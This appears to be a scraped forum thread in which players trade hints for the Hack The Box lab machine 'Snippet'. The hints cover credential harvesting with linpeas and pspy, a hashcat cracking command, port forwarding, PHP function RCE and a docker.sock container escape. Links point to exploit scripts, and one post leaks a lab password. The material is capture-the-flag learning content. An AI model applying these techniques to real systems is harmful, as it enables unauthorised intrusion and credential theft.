Posts: 0 Threads: 0 Joined: N/A (July 25, 2022, 03:27 PM)jon01 Wrote: (July 25, 2022, 03:13 PM)fironeDerbert Wrote: (July 23, 2022, 04:19 PM)Erik Wrote: Quick summary for root steps, as user steps have already been done :
- Once you're logged in as jean, search for dangerous php functions in laravel-app, using grep -Ri 'your php command' for example
- After understanding what could be exploited, forward the mysql port using ssh port forwarding, or any existing tool like chisel. The database creds can be obtained using pspy
- Perform RCE on snippet.htb by exploiting the dangerous php function
- Get a new shell logged in as application
- Escape from the docker container. If you have no idea where to start, this can help you : https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
How to log in as jean since we are connected via ssh to charlie there
there is jean password , or you can do su "EHmfar1Y7ppA9O5TAIXnYnJpA" Oh no, this is not right if you just share the password! Just run linpeas.sh script in Charlie, and you will find Jean's credential! (it's git-credentials) Posts: 36 Threads: 0 Joined: N/A (July 25, 2022, 03:27 PM)jon01 Wrote: (July 25, 2022, 03:13 PM)fironeDerbert Wrote: (July 23, 2022, 04:19 PM)Erik Wrote: Quick summary for root steps, as user steps have already been done :
- Once you're logged in as jean, search for dangerous php functions in laravel-app, using grep -Ri 'your php command' for example
- After understanding what could be exploited, forward the mysql port using ssh port forwarding, or any existing tool like chisel. The database creds can be obtained using pspy
- Perform RCE on snippet.htb by exploiting the dangerous php function
- Get a new shell logged in as application
- Escape from the docker container. If you have no idea where to start, this can help you : https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
How to log in as jean since we are connected via ssh to charlie there
there is jean password , or you can do su " please delete password man. especially after all we went through Posts: 59 Threads: 0 Joined: N/A  July 25, 2022 at 10:20 PM for the desperate minds -> https://github.com/stealthcopter/deepce
and feel free to send pull requests. it's full of TODOs, but is very useful Posts: 71 Threads: 0 Joined: N/A (July 25, 2022, 10:20 PM)undeadly Wrote: for the desperate minds -> https://github.com/stealthcopter/deepce
and feel free to send pull requests. it's full of TODOs, but is very useful Hmm can see the socket, can talk with the API via it, create containers etc, but can't seem to leverage it to get a rev shell back or mount a volume. Anyone care to outline their method? Posts: 40 Threads: 0 Joined: N/A July 27, 2022 at 11:21 AM (July 19, 2022, 11:12 PM)mimikatz Wrote: (July 19, 2022, 11:11 PM)Erik Wrote: (July 19, 2022, 11:10 PM)mimikatz Wrote: (July 19, 2022, 11:06 PM)Erik Wrote: (July 19, 2022, 10:54 PM)mimikatz Wrote: Are we supposed to crack the passwords of Charlie and/or Jean on dev.snippet.htb? I dumped that user table but only cracked accounts unrelated to the dev sub domain.
If you're talking about the dump from snippet.htb, nah you need to crack all of the hashes. If you somehow got another set of hashes from dev.snippet.htb, I'd love to know how you did that cause I'm definitely stuck trying to get anything from the XSS.
hashcat --username -m 1400 -a 0 snippethtb.txt -o cracked.txt realuniq.lst
This is what I used and it only cracked password123 which doesn't help me at all. I tried John with rockyou just in case and had no luck either. Did you apply a mask by chance? I did read previous comments but didn't help
This is to be used on snippet.htb first. You have another step there before heading to dev.snippet.htb.
Awww okay I will take another look, I had figured password re-use from that table we dumped via management/dump was the key. I'm stucked here, same password and don't know where to go, any nudge? Posts: 213 Threads: 0 Joined: N/A July 27, 2022 at 12:02 PM (July 27, 2022, 02:24 AM)skyweasel Wrote: Hmm can see the socket, can talk with the API via it, create containers etc, but can't seem to leverage it to get a rev shell back or mount a volume.
Anyone care to outline their method? Google "docker.sock exploit". You will find this script: https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25 A few modifications are necessary. (July 27, 2022, 11:21 AM)fittale1754 Wrote: I'm stucked here, same password and don't know where to go, any nudge? Log into http://snippet.htb/login Posts: 40 Threads: 0 Joined: N/A July 27, 2022 at 12:08 PM (July 27, 2022, 12:02 PM)Exa Wrote: (July 27, 2022, 02:24 AM)skyweasel Wrote: Hmm can see the socket, can talk with the API via it, create containers etc, but can't seem to leverage it to get a rev shell back or mount a volume.
Anyone care to outline their method?
Google "docker.sock exploit".
You will find this script: https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
A few modifications are necessary.
(July 27, 2022, 11:21 AM)fittale1754 Wrote: I'm stucked here, same password and don't know where to go, any nudge?
Log into http://snippet.htb/login Yeap, logged as letha, I can see a snippet from Isaac, but nothing to do... Posts: 213 Threads: 0 Joined: N/A (July 27, 2022, 12:08 PM)fittale1754 Wrote: (July 27, 2022, 12:02 PM)Exa Wrote: (July 27, 2022, 02:24 AM)skyweasel Wrote: Hmm can see the socket, can talk with the API via it, create containers etc, but can't seem to leverage it to get a rev shell back or mount a volume.
Anyone care to outline their method?
Google "docker.sock exploit".
You will find this script: https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
A few modifications are necessary.
(July 27, 2022, 11:21 AM)fittale1754 Wrote: I'm stucked here, same password and don't know where to go, any nudge?
Log into http://snippet.htb/login
Yeap, logged as letha, I can see a snippet from Isaac, but nothing to do... Create a snippet. Edit it and make it public/private. Analyze the HTTP traffic. Posts: 71 Threads: 0 Joined: N/A (July 27, 2022, 12:02 PM)Exa Wrote: Google "docker.sock exploit".
You will find this script: https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
A few modifications are necessary. Cheers Exa, yea this did the trick ,I was trying to do this manually but was obviously missing a few options. Good find, worked a treat. thx Posts: 78 Threads: 0 Joined: N/A i'm on root atm. i figured the next step is to exploit a vulnerable function in the laravel app that executes system commands. but to exploit it, i need the app secret which is perhaps in the docker container. how am i suppose to be able to get that app secret? any nudge please?
dont worry, i figured that you don't have to find out the app_secret, because you can make the backend calculate it for you as long as you are a user in the db.
|
